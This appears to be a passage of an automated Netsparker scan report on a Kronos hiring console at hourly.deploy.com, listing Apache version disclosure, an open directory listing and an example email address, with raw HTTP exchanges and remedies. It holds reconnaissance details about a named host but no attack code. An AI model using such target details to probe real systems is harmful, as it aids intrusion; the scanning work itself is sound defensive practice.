<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td height="86" align="center"> <a href="http://www.deploy.com"><img src="/images/logo.jpg" border="0"></a> </td> </tr> <tr> <td height="46" class="formCopy" align="center"> <br/> Welcome to<strong> Kronos Hiring Management Console</strong>.<br/> <br/> Please enter your username and password. <br> <br/> New user? <a href="?register=1">Click here</a> to register. <br/> </td> </tr> <tr> <td height="155" align="center"> <script> function checkEnter() { if (window.event.keyCode == 13) /* they hit enter */ document.form1.submit(); } </script> <table border="0" cellpadding="3" cellspacing="0" width="300" height="100"> <tbody> <tr> <td class="fieldLabel">Username:</td> <td><input name="j_username" type="text" tabindex="1" title="Username" size="25" maxlength="50" value="" onKeyPress="checkEnter();"></td> </tr> <tr> <td width="100" class="fieldLabel">Password:</td> <td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td> </tr> <tr> <td colspan="2" height="20" align="center">

<table id="loginBtn" class="Button" height="19" border="0" cellpadding="0" cellspacing="0" align="center">

<tr>
<td class="flexbtn_l"></td>
<td class="flexbtn_m" nowrap>

<a access= "1" class="flexbtn_m" tabindex="3" href="javascript:document.form1.submit();"

title="Login&nbsp;>" >


&nbsp;&nbsp;Login&nbsp;>&nbsp;&nbsp;



</a>
</td>
<td class="flexbtn_r"></td>
</tr>

</table>
</td> </tr> </tbody> </form> </table> </td> </tr> </table> </td> </tr></table>

</TD>
<TD class="FlexBox_right"></TD>
</TR>

<TR>
<TD class="FlexBox_ll"></TD>
<TD class="FlexBox_bot"></TD>
<TD class="FlexBox_lr"></TD>
</TR>
</TABLE>



<p>&nbsp;</p></body></html>
Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /hmc/report/index.cfm

/hmc/report/index.cfm

https://hourly.deploy.com/hmc/report/index.cfm?register=1

Extracted Version

2.0.46 (Red Hat)

Request

GET /hmc/report/index.cfm?register=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:44:13 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=26304851f26c3a5c61f6;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:44:13 GMT
Connection: close
Content-Type: text/html; charset=UTF-8











































































































































































































































































<html> <head> <title>Register</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body onLoad="document.form1.name.focus();"><link rel="STYLESHEET" type="text/css" href="/styles/albertson2_3_production_Sep24/hmc.css"><SCRIPT>var alreadySubmitted = false;function doSubmitCheck(allReadyDone,theForm) { if (allReadyDone) { //do nothing //alert(''); } else { alreadySubmitted = true; document.getElementById('registerForm').style.display='none'; document.getElementById('registerInProgress').style.display='block'; theForm.submit(); } }</SCRIPT> <form name="form1" action="/hmc/report/index.cfm?register=1" method="post" onSubmit="document.form1.register.disabled='disabled';">

<TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650"><!-- RoundedBox Table -->

<TR>
<TD class="FlexBox_ul"></TD>
<TD class="FlexBox_top"></TD>
<TD class="FlexBox_ur"></TD>
</TR>

<TR>
<TD class="FlexBox_left"></TD>
<TD class="FlexBoxContent">



<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td valign="middle" class="smallGray" style="padding-left: 10px; "> <img src="/images/logo.jpg" width="255" height="75"> <br/> <p style="width:240px; padding-left: 10px;"> <span class="largeBoldAccent">Verify Authorization</span> <br/> Your company has provided us with information in order to authorize you to register with Kronos. <br/> <br/> In order to verify your authorization to register we need the following information: </p> <img src="/images/blank.gif" width="1" height="75"> </td> <td> <div id="registerInProgress" style="display:none"> <TABLE width=340 height="380" bgcolor="#FFFFFF" style="border: 1px solid CCCCCC;" border=0 align="center" cellPadding=0 cellSpacing=0> <TBODY style="padding:14px;"> <TR> <TD vAlign=middle align="center"> <img src="/images/registrationprogress.gif" alt="Registration In Progress" width="200" height="40" border="0"> </TD> </TR> </TBODY> </TABLE> </div> <div id="registerForm"> <TABLE width=340 height="380" bgcolor="#FFFFFF" style="border: 1px solid CCCCCC;" border=0 align="center" cellPadding=0 cellSpacing=0> <TBODY style="padding:8px;"> <TR> <TD width="135" vAlign=top class="fieldLabel">Registration ID:</TD> <TD width="200" class="smallGray"><input class="reportfilter" name="name" type="text" size="25" maxlength="50"> <br> <em>Example:</em> MyCompany12345<br></TD> </TR> <TR> <TD vAlign=top class="fieldLabel">Store Number:</TD> <TD><input class="reportfilter" name="storenum" type="text" size="10" maxlength="50"><br></TD> </TR> <TR> <TD vAlign=top class="fieldLabel">Choose a Username:</TD> <TD class="smallGray"><input class="reportfilter" name="j_username" type="text" size="25" maxlength="50"> <BR> The username you provide will be used each time you log on to Kronos.<br></TD> </TR> <TR> <TD vAlign=top class="fieldLabel">Choose a Password:</TD> <TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25"> <BR> Your password must be at least 6 characters.<br></TD> </TR> <TR> <TD vAlign=top class="fieldLabel">Retype Password:</TD> <TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25"> <BR> Please confirm the password you have just entered.<br></TD> </TR> <TR> <TD noWrap vAlign=top class="fieldLabel">Enter Email Address:</TD> <TD class="smallGray"><input class="reportfilter" name="email" type="text" size="25" maxlength="100"> <BR> <em>Example:</em> gm12345@MyCompany.com</TD> </TR> <TR> <TD align=right colSpan=2>

<table class="Button" height="19" border="0" cellpadding="0" cellspacing="0" align="right">

<tr>
<td class="flexbtn_l"></td>
<td class="flexbtn_m" nowrap>

<a access= "1" class="flexbtn_m" href="javascript:doSubmitCheck(alreadySubmitted,document.form1);"

title="Register" >


&nbsp;&nbsp;Register&nbsp;&nbsp;



</a>
</td>
<td class="flexbtn_r"></td>
</tr>

</table>
</TD></FORM> </TR> </TBODY> </TABLE> </div> </td> </tr> </table>

</TD>
<TD class="FlexBox_right"></TD>
</TR>

<TR>
<TD class="FlexBox_ll"></TD>
<TD class="FlexBox_bot"></TD>
<TD class="FlexBox_lr"></TD>
</TR>
</TABLE>



</body> </html>
Directory Listing (Apache)

Directory Listing (Apache)

1 TOTAL
INFORMATION
The web server responded with a list of files located in the target directory.

Impact

An attacker can see the files located in the directory and could potentially access files which disclose sensitive information.

Actions to Take

  1. See the remedy for solution.
  2. Configure the web server to disallow directory listing requests.
  3. This can also be caused the web server products that don't have latest security patches. Ensure that all of the patches have been applied.

Remedy

Change your httpd.conf file. A secure configuration for the requested directory should be similar to the following one:
<Directory /{YOUR DIRECTORY}>
	Options FollowSymLinks 
</Directory>
Remove the Indexes option from configuration. Do not forget to remove MultiViews as well.

External References

- /styles/albertson2_3_production_Sep24/

/styles/albertson2_3_production_Sep24/

https://hourly.deploy.com/styles/albertson2_3_production_Sep24/

Request

GET /styles/albertson2_3_production_Sep24/ HTTP/1.1
Referer: https://hourly.deploy.com/styles/albertson2_3_production_Sep24/hmc.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=2630c0aeb4b14b2e4d75
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:44:12 GMT
Server: Apache/2.0.46 (Red Hat)
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:44:12 GMT
Content-Length: 563
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html> <head> <title>Index of /styles/albertson2_3_production_Sep24</title> </head> <body><h1>Index of /styles/albertson2_3_production_Sep24</h1><pre><img src="/icons/blank.gif" alt="Icon " /> <a href="?C=N;O=D">Name</a> <a href="?C=M;O=A">Last modified</a> <a href="?C=S;O=A">Size</a> <a href="?C=D;O=A">Description</a><hr /><img src="/icons/back.gif" alt="[DIR]" /> <a href="/styles/">Parent Directory</a> - <img src="/icons/text.gif" alt="[TXT]" /> <a href="IE7.css">IE7.css</a> 24-Sep-2007 04:00 13K <img src="/icons/text.gif" alt="[TXT]" /> <a href="IE7_quirksmode.css">IE7_quirksmode.css</a> 24-Sep-2007 04:00 46 <img src="/icons/text.gif" alt="[TXT]" /> <a href="adr.css">adr.css</a> 24-Sep-2007 04:00 28K <img src="/icons/folder.gif" alt="[DIR]" /> <a href="client/">client/</a> 24-Sep-2007 04:00 - <img src="/icons/text.gif" alt="[TXT]" /> <a href="form.css">form.css</a> 24-Sep-2007 04:00 4.8K <img src="/icons/text.gif" alt="[TXT]" /> <a href="hmc.css">hmc.css</a> 24-Sep-2007 04:00 30K <img src="/icons/text.gif" alt="[TXT]" /> <a href="printadr.css">printadr.css</a> 24-Sep-2007 04:00 17K <img src="/icons/text.gif" alt="[TXT]" /> <a href="report.css">report.css</a> 24-Sep-2007 04:00 18K <img src="/icons/text.gif" alt="[TXT]" /> <a href="sb.css">sb.css</a> 24-Sep-2007 04:00 14K <img src="/icons/text.gif" alt="[TXT]" /> <a href="tools.css">tools.css</a> 24-Sep-2007 04:00 4.1K <hr /></pre><address>Apache/2.0.46 (Red Hat) Server at hourly.deploy.com Port 443</address></body></html>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /hmc/report/index.cfm

/hmc/report/index.cfm

https://hourly.deploy.com/hmc/report/index.cfm?register=1

Found E-mails

gm12345@MyCompany.com

Request

GET /hmc/report/index.cfm?register=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:44:13 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=26304851f26c3a5c61f6;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:44:13 GMT
Connection: close
Content-Type: text/html; charset=UTF-8











































































































































































































































































<html> <head> <title>Register</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body onLoad="document.form1.name.focus();"><link rel="STYLESHEET" type="text/css" href="/styles/albertson2_3_production_Sep24/hmc.css"><SCRIPT>var alreadySubmitted = false;function doSubmitCheck(allReadyDone,theForm) { if (allReadyDone) { //do nothing //alert(''); } else { alreadySubmitted = true; document.getElementById('registerForm').style.display='none'; document.getElementById('registerInProgress').style.display='block'; theForm.submit(); } }</SCRIPT> <form name="form1" action="/hmc/report/index.cfm?register=1" method="post" onSubmit="document.form1.register.disabled='disabled';">

<TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650"><!-- RoundedBox Table -->

<TR>
<TD class="FlexBox_ul"></TD>
<TD class="FlexBox_top"></TD>
<TD class="FlexBox_ur"></TD>
</TR>

<TR>
<TD class="FlexBox_left"></TD>
<TD class="FlexBoxContent">



<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td valign="middle" class="smallGray" style="padding-left: 10px; "> <img src="/images/logo.jpg" width="255" height="75"> <br/> <p style="width:240px; padding-left: 10px;"> <span class="largeBoldAccent">Verify Authorization</span> <br/> Your company has provided us with information in order to authorize you to register with Kronos. <br/> <br/> In order to verify your authorization to register we need the following information: </p> <img src="/images/blank.gif" width="1" height="75"> </td> <td> <div id="registerInProgress" style="display:none"> <TABLE width=340 height="380" bgcolor="#FFFFFF" style="border: 1px solid CCCCCC;" border=0 align="center" cellPadding=0 cellSpacing=0> <TBODY style="padding:14px;"> <TR> <TD vAlign=middle align="center"> <img src="/images/registrationprogress.gif" alt="Registration In Progress" width="200" height="40" border="0"> </TD> </TR> </TBODY> </TABLE> </div> <div id="registerForm"> <TABLE width=340 height="380" bgcolor="#FFFFFF" style="border: 1px solid CCCCCC;" border=0 align="center" cellPadding=0 cellSpacing=0> <TBODY style="padding:8px;"> <TR> <TD width="135" vAlign=top class="fieldLabel">Registration ID:</TD> <TD width="200" class="smallGray"><input class="reportfilter" name="name" type="text" size="25" maxlength="50"> <br> <em>Example:</em> MyCompany12345<br></TD> </TR> <TR> <TD vAlign=top class="fieldLabel">Store Number:</TD> <TD><input class="reportfilter" name="storenum" type="text" size="10" maxlength="50"><br></TD> </TR> <TR> <TD vAlign=top class="fieldLabel">Choose a Username:</TD> <TD class="smallGray"><input class="reportfilter" name="j_username" type="text" size="25" maxlength="50"> <BR> The username you provide will be used each time you log on to Kronos.<br></TD> </TR> <TR> <TD vAlign=top class="fieldLabel">Choose a Password:</TD> <TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25"> <BR> Your password must be at least 6 characters.<br></TD> </TR> <TR> <TD vAlign=top class="fieldLabel">Retype Password:</TD> <TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25"> <BR> Please confirm the password you have just entered.<br></TD> </TR> <TR> <TD noWrap vAlign=top class="fieldLabel">Enter Email Address:</TD> <TD class="smallGray"><input class="reportfilter" name="email" type="text" size="25" maxlength="100"> <BR> <em>Example:</em> gm12345@MyCompany.com</TD> </TR> <TR> <TD align=right colSpan=2>

<table class="Button" height="19" border="0" cellpadding="0" cellspacing="0" align="right">

<tr>
<td class="flexbtn_l"></td>
<td class="flexbtn_m" nowrap>

<a access= "1" class="flexbtn_m" href="javascript:doSubmitCheck(alreadySubmitted,document.form1);"

title="Register" >


&nbsp;&nbsp;Register&nbsp;&nbsp;



</a>
</td>
<td class="flexbtn_r"></td>
</tr>

</table>
</TD></FORM> </TR> </TBODY> </TABLE> </div> </td> </tr> </table>

</TD>
<TD class="FlexBox_right"></TD>
</TR>

<TR>
<TD class="FlexBox_ll"></TD>
<TD class="FlexBox_bot"></TD>
<TD class="FlexBox_lr"></TD>
</TR>
</TABLE>



</body> </html>